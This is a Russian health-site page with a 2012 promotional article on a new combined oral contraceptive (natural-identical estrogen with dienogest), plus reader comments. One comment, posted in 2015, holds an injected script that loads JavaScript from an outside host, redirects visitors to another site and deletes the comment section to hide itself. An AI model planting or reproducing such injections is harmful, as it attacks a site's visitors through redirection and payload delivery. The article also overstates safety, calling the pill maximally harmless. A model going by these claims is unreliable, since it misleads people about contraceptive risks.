Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Контрацепция нового покол...  >>  Контрацепция нового поколения
 
Обратная связь
 
Научные статьи и информация о лекарственых препаратах
предназначены исключительно для медицинских
и фармацевтических работников

Контрацепция нового поколения

Размер шрифта
22 марта 2012 07:52
  • google_analytics: false
  • Нравится

Прорывом в области гормональной контрацепции стало создание первых противозачаточных таблеток с эстрогеном, который близок по составу к натуральному женскому половому гормону.

1

История создания

Поиски идеальной формулы препарата продолжались более 30 лет. Изучение состава естественных гормонов, режим дозировки, который полностью повторяет природные процессы, минимальная гормональная составляющая – в итоге эффективный и безопасный препарат готов. В испытаниях нового препарата приняли участие 5 000 женщин по всему миру, наконец, спустя несколько лет, защита от беременности доказана, так же как и отсутствие влияния на массу тела.

Механизм действия

Основой всех женских функций является менструальный цикл, во время которого под воздействием половых гормонов в яичнике созревает яйцеклетка и происходит овуляция, т.е. ее выход в брюшную полость. После происходит встреча яйцеклетки со сперматозоидом, оплодотворение. Наступает беременность. Для закрепления оплодотворенной яйцеклетки в матке, внутренняя оболочка матки (эндометрий) утолщается под воздействием гормонов и превращается в удобную «подушку» для плода. Эти процессы происходят под влиянием основных женских половых гормонов – эстрогена и гестагена (прогестерона).

Суть комбинированной оральной контрацепции состоит в том, чтобы в первую очередь не допустить овуляции. Нет овуляции – нет беременности. Для этого нужно приостановить работу яичников с помощью гестагена.

Без эстрогенов тоже не обойтись, эстрогены – это вещества, которые делают женщину привлекательной для мужчин и повышают уровень ее полового влечения. Эстрогены отвечают и за то, чтобы организм женщины работал «как часы», оберегают и поддерживают ее здоровье. Оставить женщину без эстрогенов нельзя.

Вот почему первая противозачаточная таблетка с эстрогеном, идентичный натуральному, была так долгожданна и для гинекологов, и для женщин.

Плюсы нового препарата

Создавая «идеальный контрацептив», ученые стремились использовать гестаген с выраженным контрацептивным действием, причем в таких дозах, чтобы вмешательство в естественные процессы женского организма было минимальным. Роль такого натурального гестагена в таблетках играет диеногест. Он действует избирательно, практически не оказывая влияния на метаболизм, и очень быстро выводится из организма. Кроме того, диеногест обладает антиандрогенным влиянием: уменьшает влияние мужских половых гормонов и улучшает состояние кожи.

Будущее контрацепции

Контрацепция с эстрогеном, идентичным натуральному и динамический режим дозирования – то, что нужно российским женщинам, чтобы не только уберечься от нежелательной беременности, но и сохранить здоровье и красоту. Такая контрацепция максимально безвредна и приближена к естественным процессам женского организма.

Как показали результаты европейского исследования, 60% россиянок репродуктивного возраста, нуждающихся в защите от нежелательной беременности, когда-либо принимали противозачаточные таблетки. Тем не менее только 9% из них в настоящее время принимают комбинированные гормональные контрацептивы.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гульзин

24 апреля 2012 в 17:04

Цитировать   |   Пожаловаться

я не поняла как они называются эти противозачаточные таблетки,они уже продаются?

2 - Гость

22 сентября 2012 в 15:23

Цитировать   |   Пожаловаться

Статья интересная, но действительно непонятно про какие таблетки идет речь. Я в свое время много разных средств перепробовала и постоянно вылезали разные неприятные побочки. Решила перейти на барьерный метод, но мой молодой человек протестовал против презервативов, начала пользоваться свечами, так делаю и до сих пор. Свое тоже не сразу нашла, в итоге сейчас пользуюсь Бенгатексом, довольна.

3 - Gamazina

22 сентября 2012 в 15:26

Цитировать   |   Пожаловаться

Ой, не залогинилась почему-то, про свечи это я писала :)

4 - Алевтина

27 ноября 2012 в 11:55

Комментарий удален за нарушение Правил общения

5 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.